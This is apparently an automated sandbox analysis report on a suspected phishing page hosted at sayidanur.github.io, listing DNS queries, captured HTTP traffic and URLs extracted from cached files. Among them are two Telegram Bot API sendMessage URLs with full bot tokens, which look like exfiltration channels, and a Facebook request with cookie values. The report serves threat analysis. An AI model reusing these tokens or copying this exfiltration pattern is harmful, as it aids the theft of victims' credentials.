    Source: chromecache_667.2.drString found in binary or memory: var YOb=function(a){return _.Ca(a===null?"null":a===void 0?"undefined":a)},ZOb=function(a){const b=new _.Yn(a);return b.V==="www.youtube.com"&&b.H==="/watch"?(a=_.lo(b,"v"),`https://www.youtube.com/embed/${encodeURIComponent(a)}`):a},$Ob=function(a,b){a.H.size===0&&a.N.addEventListener("message",d=>{if(/\.google\.com$/.test(d.origin)&&d.data){var e=a.H.get(d.data.type);e&&e.Ci().forEach(f=>{f.call(d)})}});var c=a.H.get("CLOSE_DIALOG");c?c.add(b):(c=new _.PL,c.add(b),a.H.set("CLOSE_DIALOG",c))},aPb= equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: sayidanur.github.io
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: static.xx.fbcdn.net
    Source: global trafficDNS traffic detected: DNS query: facebook.com
    Source: global trafficDNS traffic detected: DNS query: is1-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is2-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is5-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is4-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: is3-ssl.mzstatic.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: play-lh.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: i.ytimg.com
    Source: global trafficDNS traffic detected: DNS query: play-games.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: unknownHTTP traffic detected: POST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=1&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1Host: www.facebook.comConnection: keep-aliveContent-Length: 914sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQGkdC1KMpjrajKKoAccept: */*Origin: https://www.facebook.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.facebook.com/?locale=ru_RUAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: M5/p1aPhym2t/lNZkCgy8Pwklloar4OJtsseSKs3cN9E6Oa71pqH83ABS3A5tKaZ4GBnMm4ccluODWJkCGy8DA==Date: Sun, 29 Sep 2024 04:53:25 GMTTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: empd8EoUgjul8u6efHKm5s7S6MFzNGeMaeRM/o4QwYZ9FIxyWN9ozCPJrJxjQotEADST4ULm19Lg4RmgVsDMlw==Date: Sun, 29 Sep 2024 04:53:46 GMTTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: S58JumP9j49memGgvcLS9SC+NSj1Wk3uff8vHK/EoKaOTvtkB7q31l8WG/ySIWAmqnqAagOjdBQ8tHuF/b/Kwg==Date: Sun, 29 Sep 2024 04:54:41 GMTTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: mZbFwMN35xtZFL9IGU2eWDFR08edY8OiOS42KGMHnUWkPj7AOGpM8YLkhh+ZzHFX3WCFcnrxzxhi4zajcjoUMA==Date: Sun, 29 Sep 2024 04:54:47 GMTTransfer-Encoding: chunked
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: http://127.0.0.1:$
    Source: chromecache_576.2.drString found in binary or memory: http://git.io/yBU2rg
    Source: chromecache_382.2.drString found in binary or memory: http://help.instagram.com/
    Source: chromecache_382.2.drString found in binary or memory: http://instagram.com/
    Source: chromecache_382.2.drString found in binary or memory: http://instagram.com/legal/privacy/
    Source: chromecache_677.2.drString found in binary or memory: http://jedwatson.github.io/classnames
    Source: chromecache_672.2.drString found in binary or memory: http://reportaproblem.apple.com
    Source: chromecache_672.2.drString found in binary or memory: http://schema.org
    Source: chromecache_657.2.dr, chromecache_716.2.drString found in binary or memory: http://support.google.com/googleplay?p=report_review_computer
    Source: chromecache_382.2.drString found in binary or memory: http://vsco.co/about/privacy_policy
    Source: chromecache_382.2.drString found in binary or memory: http://vsco.co/about/terms_of_use
    Source: chromecache_382.2.drString found in binary or memory: http://vsco.co/vscocam
    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: chromecache_382.2.drString found in binary or memory: http://www.apple.com/uk/itunes/download/
    Source: chromecache_592.2.dr, chromecache_690.2.drString found in binary or memory: http://www.broofa.com
    Source: chromecache_382.2.drString found in binary or memory: http://www.capcut.com/clause/terms-of-service
    Source: chromecache_382.2.drString found in binary or memory: http://www.snapchat.com
    Source: chromecache_382.2.drString found in binary or memory: https://about.instagram.com/safety
    Source: chromecache_771.2.drString found in binary or memory: https://ad.doubleclick.net
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: https://ade.googlesyndication.com
    Source: chromecache_753.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
    Source: chromecache_382.2.drString found in binary or memory: https://amp-api-edge.apps.apple.com
    Source: chromecache_619.2.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
    Source: chromecache_723.2.drString found in binary or memory: https://api.telegram.org/bot6681983180:AAFEgYgqQiWC4-0rAdlW7Vu_4RBUF_r6se4/sendMessage?chat_id=69772
    Source: chromecache_443.2.drString found in binary or memory: https://api.telegram.org/bot7363306617:AAHr68RFfPzZGKytCR0Lw_6V404fug3Ld68/sendMessage?chat_id=55938
    Source: chromecache_804.2.dr, chromecache_795.2.drString found in binary or memory: https://apis.google.com/js/api.js
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com/
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/#organization
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com/$
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/assets/images/knowledge-graph/apps.png
    Source: chromecache_382.2.dr, chromecache_672.2.drString found in binary or memory: https://apps.apple.com/story/id1538632801
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com/story/id1539235847
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com/story/id1604959672
    Source: chromecache_672.2.drString found in binary or memory: https://apps.apple.com/us/app/apple-podcasts/id525463029
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/capcut-photo-video-editor/id1500855883
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/capcut-photo-video-editor/id1500855883&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/google-photos-backup-edit/id962194608
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/google-photos-backup-edit/id962194608&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/instagram/id389801252
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/meta-verified-standard/id389801252
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/photogrid-video-collage-maker/id543577420
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/photogrid-video-collage-maker/id543577420&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/picsart-photo-video-editor-ai/id587366035
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/picsart-photo-video-editor-ai/id587366035&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/snapchat-chat-with-friends/id447188370
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/snapchat-chat-with-friends/id447188370&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/threads/id6446901002
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/threads/id6446901002&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/youtube-watch-listen-stream/id544007664
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/app/youtube-watch-listen-stream/id544007664&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/photo-video-apps/6008
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/photo-video-apps/6008&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/charts/iphone/social-networking-apps/6005
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/developer/instagram-inc/id389801255
    Source: chromecache_382.2.drString found in binary or memory: https://apps.apple.com/uz/developer/instagram-inc/id389801255&quot;
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d93
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/64/14/47/6414476d-f4db-9bb4-93d
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/6c/96/3e/6c963ee5-4628-1a7b-0fb
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/6d/09/1a/6d091aa9-8f9b-ceef-784
    Source: chromecache_382.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/7d/00/84/7d008488-5cbd-2a24-3f4
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a27
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/af/15/b8/af15b8a4-f74c-005a-577
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/ca/6e/70/ca6e7071-fd4a-0ffb-021
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/d9/1a/28/d91a28c5-990f-9b2d-d65
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/14/d0/cf/14d0cf5e-72c7-1df3-011
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6da
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/26/88/2d/26882db6-6bcb-c8a7-551
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/27/89/28/2789285f-d6b5-bc68-c40
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/36/6e/6d/366e6dd2-48bc-7183-b44
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/3d/aa/33/3daa3394-79fb-ec46-44b
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/4b/30/dd/4b30dd46-32ed-b621-bd1
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-914
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/82/e9/58/82e9586b-1983-5439-1cb
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/8f/cb/4e/8fcb4e35-30df-c295-bbd
    Source: chromecache_951.2.dr, chromecache_654.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/a0/6f/ba/a06fba65-f57a-cf31-312
    Source: chromecache_382.2.drString found in binary or memory: https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/af/e7/92/afe79244-897a-982a-4b1
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://buy.music.apple.com/account/v1/affiliation/association
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://buy.tv.apple.com/account/v1/affiliation/association
    Source: chromecache_354.2.dr, chromecache_771.2.dr, chromecache_753.2.drString found in binary or memory: https://cct.google/taggy/agent.js
    Source: chromecache_723.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css
    Source: chromecache_605.2.dr, chromecache_782.2.drString found in binary or memory: https://civilrights.org
    Source: chromecache_683.2.dr, chromecache_913.2.drString found in binary or memory: https://connect.facebook.net/
    Source: chromecache_943.2.dr, chromecache_388.2.dr, chromecache_661.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: chromecache_683.2.dr, chromecache_913.2.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
    Source: chromecache_576.2.drString found in binary or memory: https://deprecations.emberjs.com/v1.x/#toc_binding-style-attributes.
    Source: chromecache_738.2.dr, chromecache_437.2.drString found in binary or memory: https://fburl.com/dialog-provider).
    Source: chromecache_347.2.drString found in binary or memory: https://fburl.com/silvertail-theme
    Source: chromecache_866.2.drString found in binary or memory: https://fburl.com/wiki/e0vmgfv2
    Source: chromecache_680.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_680.2.drString found in binary or memory: https://fontawesome.com/license/free
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://git.io/fjule
    Source: chromecache_816.2.drString found in binary or memory: https://git.io/fxCyr
    Source: chromecache_771.2.drString found in binary or memory: https://google.com
    Source: chromecache_771.2.drString found in binary or memory: https://googleads.g.doubleclick.net
    Source: chromecache_382.2.drString found in binary or memory: https://help.instagram.com/581066165581870
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features111/v4/59/af/9e/59af9e68-220c-50d1-fb85-734b137d1e8
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features115/v4/d1/7a/86/d17a8639-c381-e3fd-8db6-ace1845212e
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features116/v4/ec/8c/b5/ec8cb547-a88f-bd50-0bae-ecf33835cf8
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features116/v4/fd/d3/28/fdd32829-7ea9-7aa9-111f-841ef171137
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features126/v4/6b/af/44/6baf4452-1a87-926e-7a9c-96481f9b8ec
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features126/v4/ab/a2/60/aba26099-a4af-3549-e0f0-27d72ff767d
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features128/v4/34/79/49/347949aa-f867-69b4-ac8e-d9cc7ffdff9
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features211/v4/3f/61/db/3f61dbf5-465f-6ae9-c54f-49d35c6933d
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features211/v4/d5/b8/dc/d5b8dc04-f1b2-abd5-3099-4ab3355f389
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Features3/v4/68/2d/b7/682db7fa-e9d5-ec7d-c694-fa2b0bd4d15d/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple128/v4/e6/05/c7/e605c7cb-75d7-63b5-dcb4-c0e6f4677de3/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/17/ee/40/17ee4015-c746-3909-e5ad-5310657469ad/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/45/63/1c/45631cea-499d-7f62-74ce-b282dfdd0a10/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/84/16/80/841680b1-3872-7fa5-37c4-35741395390c/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/b1/45/39/b1453933-5ac1-7d17-9bf8-1d4788c3ef2f/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple22/v4/da/ea/2e/daea2ed3-5a5b-16e5-15b2-26d579fa6532/m
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/3a/91/07/3a9107db-4c42-a961-c373-e8b8b49e9682/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/89/00/9a/89009a28-b477-04c7-bf2b-5a3cbce98d75/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/93/65/69/9365698a-8861-3219-065b-aea2043ac9a8/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/98/34/f8/9834f897-1802-89f1-2d7e-a570b058ee68/
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/Purple41/v4/2b/19/6e/2b196ea9-0dcf-8a80-f1ef-ebaadd8c9562/m
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/62/ea/16/62ea1604-eb2e-1371-11a4-d5dabd1
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/6f/28/f4/6f28f46a-cabc-9913-6e2b-e73eeff
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/90/ba/87/90ba87a6-2827-11c3-8c1b-c399d92
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/98/f3/c8/98f3c8ef-5329-e31d-ced9-6131d25
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/b7/76/d6/b776d664-06a6-c170-021c-b889976
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/c3/02/0b/c3020b3d-eb76-6a5e-97a5-3df9c8c
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/43/ca/45/43ca45f2-1eb7-fd56-ce61-157e374
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/49/c9/10/49c9108b-bdfc-c8e2-7693-47fd03b
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/9b/1a/9f/9b1a9fad-186d-1acc-1511-c093c0e
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/92/56/e5/9256e528-a2d2-4c99-844e-1e1c33a
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/a2/40/7b/a2407b8d-1229-29f2-2166-ae4e7d9
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/ea/8a/59/ea8a59a7-8aeb-b59b-66d9-31258c4
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleVideo221/v4/ce/c0/92/cec092b1-23e1-b4b4-d21a-a86074e9
    Source: chromecache_382.2.drString found in binary or memory: https://is1-ssl.mzstatic.com/image/thumb/PurpleVideo221/v4/d6/4e/80/d64e804d-f508-3f55-8767-2f83c579
    Source: chromecache_382.2.drString found in binary or memory: https://is2-ssl.mzstatic.com
    Source: chromecache_382.2.drString found in binary or memory: https://is3-ssl.mzstatic.com
    Source: chromecache_382.2.drString found in binary or memory: https://is4-ssl.mzstatic.com
    Source: chromecache_382.2.drString found in binary or memory: https://is5-ssl.mzstatic.com
    Source: chromecache_672.2.drString found in binary or memory: https://itunes.apple.com/WebObjects/MZStore.woa/wa/viewTop?cc=
    Source: chromecache_672.2.drString found in binary or memory: https://itunes.apple.com/WebObjects/MZStore.woa/wa/viewTop?genreId=38&mt=11
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://itunes.apple.com/WebObjects/MZStoreServices.woa/wa/processRedirectUrl
    Source: chromecache_382.2.drString found in binary or memory: https://itunes.apple.com/subscribe?app=music
    Source: chromecache_382.2.drString found in binary or memory: https://itunes.apple.com/uz/genre/id6008
    Source: chromecache_382.2.drString found in binary or memory: https://itunes.apple.com/uz/genre/id6008&quot;
    Source: chromecache_382.2.drString found in binary or memory: https://js-cdn.music.apple.com
    Source: chromecache_352.2.dr, chromecache_678.2.dr, chromecache_595.2.dr, chromecache_910.2.dr, chromecache_402.2.dr, chromecache_401.2.dr, chromecache_465.2.dr, chromecache_719.2.dr, chromecache_946.2.dr, chromecache_838.2.dr, chromecache_442.2.dr, chromecache_689.2.dr, chromecache_797.2.dr, chromecache_861.2.dr, chromecache_616.2.dr, chromecache_841.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt
    Source: chromecache_382.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v2/amp/musickit.js?t=1726695429822
    Source: chromecache_382.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v2/components/musickit-components/
    Source: chromecache_382.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//musickit-components.esm.j
    Source: chromecache_382.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//musickit-components.js?t=
    Source: chromecache_564.2.dr, chromecache_816.2.drString found in binary or memory: https://js-cdn.music.apple.com/musickit/v2/media-api
    Source: chromecache_382.2.drString found in binary or memory: https://locate.apple.com/uz/en/
    Source: chromecache_657.2.dr, chromecache_713.2.dr, chromecache_716.2.dr, chromecache_461.2.drString found in binary or memory: https://maps.google.com/?q=
    Source: chromecache_382.2.drString found in binary or memory: https://media.grid.plus/doc/grid_plus_privacy_policy
    Source: chromecache_382.2.drString found in binary or memory: https://media.grid.plus/doc/grid_plus_terms_of_service
    Source: chromecache_452.2.drString found in binary or memory: https://messenger.com/
    Source: chromecache_382.2.drString found in binary or memory: https://osxapps.itunes.apple.com/itunes-assets/Purple211/v4/a0/d1/58/a0d15877-7f09-4c09-2007-776be9b
    Source: chromecache_753.2.drString found in binary or memory: https://pagead2.googlesyndication.com
    Source: chromecache_354.2.dr, chromecache_771.2.dr, chromecache_753.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js?rk=1
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://payments.sandbox.google.com/payments/v4/js/integrator.js?rk=1
    Source: chromecache_383.2.dr, chromecache_956.2.drString found in binary or memory: https://play.google.com
    Source: chromecache_586.2.dr, chromecache_667.2.drString found in binary or memory: https://play.google.com/
    Source: chromecache_461.2.drString found in binary or memory: https://play.google.com/about/comment-posting-policy/
    Source: chromecache_697.2.dr, chromecache_657.2.dr, chromecache_716.2.drString found in binary or memory: https://play.google.com/about/comment-posting-policy?hl=
    Source: chromecache_592.2.dr, chromecache_447.2.dr, chromecache_363.2.dr, chromecache_690.2.drString found in binary or memory: https://play.google.com/about/play-terms/index.html
    Source: chromecache_697.2.drString found in binary or memory: https://play.google.com/about/play-terms/index.html;target;_blank;class;cOP9Jc
    Source: chromecache_713.2.dr, chromecache_447.2.dr, chromecache_461.2.dr, chromecache_363.2.drString found in binary or memory: https://play.google.com/googleplaygames
    Source: chromecache_697.2.drString found in binary or memory: https://play.google.com/googleplaygames;target;_blank;class;cOP9Jc
    Source: chromecache_697.2.dr, chromecache_447.2.dr, chromecache_363.2.drString found in binary or memory: https://play.google.com/intl/all_
    Source: chromecache_956.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_723.2.drString found in binary or memory: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US
    Source: chromecache_592.2.dr, chromecache_697.2.dr, chromecache_447.2.dr, chromecache_363.2.dr, chromecache_690.2.drString found in binary or memory: https://policies.google.com/privacy
    Source: chromecache_592.2.dr, chromecache_447.2.dr, chromecache_363.2.dr, chromecache_690.2.drString found in binary or memory: https://policies.google.com/terms
    Source: chromecache_697.2.drString found in binary or memory: https://policies.google.com/terms;target;_blank;class;cOP9Jc
    Source: chromecache_677.2.drString found in binary or memory: https://preactjs.com
    Source: chromecache_576.2.drString found in binary or memory: https://raw.github.com/emberjs/ember.js/master/LICENSE
    Source: chromecache_713.2.dr, chromecache_461.2.dr, chromecache_382.2.drString found in binary or memory: https://schema.org
    Source: chromecache_713.2.dr, chromecache_461.2.drString found in binary or memory: https://schema.org/InStock
    Source: chromecache_366.2.dr, chromecache_697.2.drString found in binary or memory: https://schema.org/Offer
    Source: chromecache_713.2.dr, chromecache_461.2.drString found in binary or memory: https://schema.org/PreOrder
    Source: chromecache_497.2.drString found in binary or memory: https://scontent.xx.fbcdn.net/hads-ak-prn2/1487645_6012475414660_1439393861_n.png
    Source: chromecache_390.2.dr, chromecache_360.2.drString found in binary or memory: https://ssl.gstatic.com/support/realtime/operator/
    Source: chromecache_705.2.dr, chromecache_799.2.drString found in binary or memory: https://ssl.gstatic.com/support/realtime/operator/1726819261182/operatordeferred_bin_base.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/s1oFVSwofs5.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y6/r/a2il9m3oo2U.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/OJuPnvrkEfZ.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/4zS6aBDBtHT.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js
    Source: chromecache_452.2.drString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
    Source: chromecache_753.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
    Source: chromecache_619.2.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: chromecache_672.2.drString found in binary or memory: https://support.apple.com/
    Source: chromecache_382.2.drString found in binary or memory: https://support.apple.com/en-gb/billing
    Source: chromecache_382.2.drString found in binary or memory: https://support.apple.com/en-uz/?cid=gn-ols-home-hp-tab
